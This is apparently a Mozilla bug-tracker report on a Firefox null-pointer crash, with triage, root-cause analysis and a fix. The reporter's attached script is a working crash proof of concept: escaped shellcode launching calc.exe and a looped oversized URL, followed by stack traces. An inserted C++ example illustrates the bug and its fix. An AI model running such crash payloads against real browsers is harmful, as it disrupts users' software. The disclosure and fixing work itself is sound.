Bug 614756 - Firefox pointer dereference
Status: Closed, RESOLVED FIXED
Opened 14 years ago; closed 14 years ago
Categories: Core :: DOM: Navigation, defect
Target milestone: mozilla2.0b8
People: Reporter: info; Assigned: MatsPalmgren_bugz
Keywords: crash; Whiteboard: [sg:dos] safe null-pointer read
Attachments (2 files):
  486 bytes, text/html
  2.91 KB, patch (smaug: review+; roc: approval2.0+; dveditz: approval1.9.2.14+; dveditz: approval1.9.1.17+)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.2.12) Gecko/20101026
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.2.12) Gecko/20101026
A (NULL) pointer dereference was discovered in Firefox by creating a huge escaped Unicode string and passing it to the address bar. The string length is determined, copied into memory, and a wrong pointer results in a NULL being passed as an argument and dereferenced, leading to a segmentation fault, which eventually crashes the Firefox application.
Vulnerability: Memory access violation.
Problem: (NULL) pointer dereference, leads to segmentation fault.
Severity: Medium.
Image: MOZCRT19.dll
Procedure: MOZCRT19 strlen(unsigned char * buf = <Memory access error>)+0x30
Code execution: Unlikely.
Expected: Fix pointer in code, and/or trap exception.
Code:
<script>
var poison = '';
var header = unescape("%u5050%u5050");
// Path to calc.exe on WINXP SP3, for testing only.
// Can be filled with any random chars.
var shellcode = unescape(
    "%u16eb%u315b%u50c0%ubb53"
  + "%u250d%u7c86%ud3ff"
  + "%uc031%ubb50%ucb12"
  + "%u7c81%ud3ff%ue5e8"
  + "%uffff%u63ff%u6c61"
  + "%u2e63%u7865%u0065");
while (header.length < (shellcode.length + 41)) { header += header; }
for (var i = 0; i < 999999; i++) {
    poison += header;
    poison += shellcode;
}
document.location = 'http://' + header + poison;
</script>
Stacktrace.
-------------------------------------------------------------------------------------------------------
Call stack of main thread
Address Procedure / arguments Called from
0012DF88 <JMP.&MOZCRT19.strlen> xul.10341904
0012DF8C s = NULL ; passed argument NULL!
0012DFF8 xul.100A19C0 xul.100845EA
0012E008 xul.100845DD xul.106471CF
0012E00C Arg1 = 00000000
0012E010 Arg2 = FFFFFFFF
-------------------------------------------------------------------------------------------------------
10341904 8 3350FBFF CALL <JMP.&MOZCRT19.strlen> ; \strlen s=NULL
0012E00C Arg1 = 00000000
-------------------------------------------------------------------------------------------------------
0012df84 10341909 MOZCRT19!strlen(unsigned char * buf = <Memory access error>)+0x30
intel\strlen.asm @ 81]
; passing a NULL!
-------------------------------------------------------------------------------------------------------
78150580 8b01 mov eax,dword ptr [ecx]
-------------------------------------------------------------------------------------------------------
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 78150580 (MOZCRT19!strlen+0x00000030)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 00000000
Attempt to read from address 00000000
-------------------------------------------------------------------------------------------------------
Message=[06:54:28] Access violation when reading [00000000]
-------------------------------------------------------------------------------------------------------
Reproducible: Always
Steps to Reproduce:
1. Run attached code
2. sit still
3. ...
Actual Results:
Crash.
Expected Results:
Raised exception.
Fix pointer, exception trap.
Comment 1•14 years ago (Reporter)
Updated•14 years ago
Summary: Firefox pointer derefence → Firefox pointer dereference
Comment 2•14 years ago
Marking security-sensitive for now in order to make sure triage is done properly.
Group: core-security
Keywords: crash
Comment 3•14 years ago (Assignee)
bp-73f94aba-e0c2-4aa5-b592-ef3532101125
This is a non-exploitable null-pointer crash; we're doing strlen(NULL)
in ReplaceASCII() here:
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/xpcom/string/src/nsTSubstring.cpp&rev=1.26&root=/cvsroot&mark=510#507
The root of the problem is in nsDocShell::LoadErrorPage()
http://bonsai.mozilla.org/cvsblame.cgi?file=/mozilla/docshell/base/nsDocShell.cpp&rev=1.919&root=/cvsroot#3275
which tries to build a new URL based on the content page url and
a few other parameters. The page url is a string near the maximum (2GB).
nsEscape() returns NULL on OOM. AppendASCII(NULL) leads to strlen(NULL).
I have a fix for this, just want to make sure it doesn't lead to new
problems...
Component: Security → History: Global
OS: Windows XP → All
Product: Firefox → Core
QA Contact: firefox → history.global
Hardware: x86 → All
Whiteboard: [sg:dos] safe null-pointer read
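As an added illustration of the chain Mats describes (nsEscape() returning NULL on OOM, then AppendASCII() calling strlen() on it), here is a scaled-down C++ model with the unchecked path next to the checked one. This is not Mozilla's code: the function names, the simulateOOM flag and the "about:neterror?u=" prefix are assumptions made for the example.

```cpp
#include <cctype>
#include <cstring>
#include <new>
#include <string>

// Stand-in for nsEscape(): percent-escapes bytes outside [A-Za-z0-9] and
// returns nullptr when the output buffer cannot be allocated (simulateOOM
// forces that path so the failure can be exercised). Caller owns the buffer.
char* escapeOrNull(const char* in, bool simulateOOM) {
    static const char hex[] = "0123456789ABCDEF";
    std::size_t len = std::strlen(in);
    char* out = simulateOOM ? nullptr : new (std::nothrow) char[len * 3 + 1];
    if (!out) return nullptr;  // allocation failed, as nsEscape() does on OOM
    std::size_t o = 0;
    for (std::size_t i = 0; i < len; ++i) {
        unsigned char c = static_cast<unsigned char>(in[i]);
        if (std::isalnum(c)) out[o++] = static_cast<char>(c);
        else { out[o++] = '%'; out[o++] = hex[c >> 4]; out[o++] = hex[c & 15]; }
    }
    out[o] = '\0';
    return out;
}

// Stand-in for AppendASCII(): measures the C string with strlen() and appends
// it. A nullptr argument makes strlen() read address 0, which is the crash.
void appendASCII(std::string& dst, const char* s) {
    dst.append(s, std::strlen(s));
}

// Before the fix: the escape result goes straight into appendASCII(). With
// simulateOOM == true this reaches strlen(nullptr) and the process dies.
std::string buildErrorUrlUnchecked(const char* page, bool simulateOOM) {
    std::string url = "about:neterror?u=";  // constructed prefix (assumption)
    char* esc = escapeOrNull(page, simulateOOM);
    appendASCII(url, esc);  // no nullptr check
    delete[] esc;
    return url;
}

// After the fix: a nullptr from the escaper is an error to report, not a
// string to measure. Returns false so the caller can bail out on OOM.
bool buildErrorUrlChecked(const char* page, bool simulateOOM, std::string& url) {
    url = "about:neterror?u=";
    char* esc = escapeOrNull(page, simulateOOM);
    if (!esc) return false;  // propagate the allocation failure
    appendASCII(url, esc);
    delete[] esc;
    return true;
}
```

Only the checked builder is safe to call with simulateOOM set; the unchecked one reproduces the null read at that point.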
Updated•14 years ago (Assignee)
Assignee: nobody → matspal
Status: UNCONFIRMED → NEW
Component: History: Global → Document Navigation
Ever confirmed: true
QA Contact: history.global → docshell
Comment 4•14 years ago (Assignee)
BTW, the "slow script" dialog comes up with a clean profile for me
on both Linux and WinXP.
Sasha, did you get that dialog?
Comment 5•14 years ago (Assignee)
Patch is against 1.9.2, but it also applies to mozilla-central and 1.9.1.
Attachment #493324 - Flags: review?(Olli.Pettay)
Comment 6•14 years ago (Reporter)
Hi Mats,
I did not get the dialog. I got a dialog on MSIE 7 and 8 in emulation mode, but not on Firefox. But this can be circumvented by making smaller loops and concatenating them, if it actually does happen.
I tried to find some more information about MOZCRT19.dll, but could not find anything. So it was a wild guess what was actually happening. Good to see the root of the problem, clarifies a lot.
Updated•14 years ago
Attachment #493324 - Flags: review?(Olli.Pettay) → review+
Comment 7•14 years ago (Assignee)
smaug: the #undef is just to avoid a (future) name clash. I'll take it out
if you think it's unnecessary.
Updated•14 years ago (Assignee)
Attachment #493324 - Flags: approval2.0?
Updated•14 years ago (Assignee)
status1.9.1: --- → ?
status1.9.2: --- → ?
Attachment #493324 - Flags: approval2.0? → approval2.0+
Comment 8•14 years ago (Assignee)
Status: NEW → RESOLVED
Closed: 14 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla2.0b8
Updated•14 years ago (Assignee)
Attachment #493324 - Flags: approval1.9.2.14?
Attachment #493324 - Flags: approval1.9.1.17?
Comment 9•14 years ago
Comment on attachment 493324 [details] [diff] [review]
Patch rev. 1
Approved for 1.9.2.14 and 1.9.1.17, a=dveditz for release-drivers
Attachment #493324 - Flags: approval1.9.2.14?
Attachment #493324 - Flags: approval1.9.2.14+
Attachment #493324 - Flags: approval1.9.1.17?
Attachment #493324 - Flags: approval1.9.1.17+
Updated•14 years ago
Group: core-security
Comment 10•14 years ago (Assignee)
http://hg.mozilla.org/releases/mozilla-1.9.2/rev/ab2ea7569e43
http://hg.mozilla.org/releases/mozilla-1.9.1/rev/a68d38b17132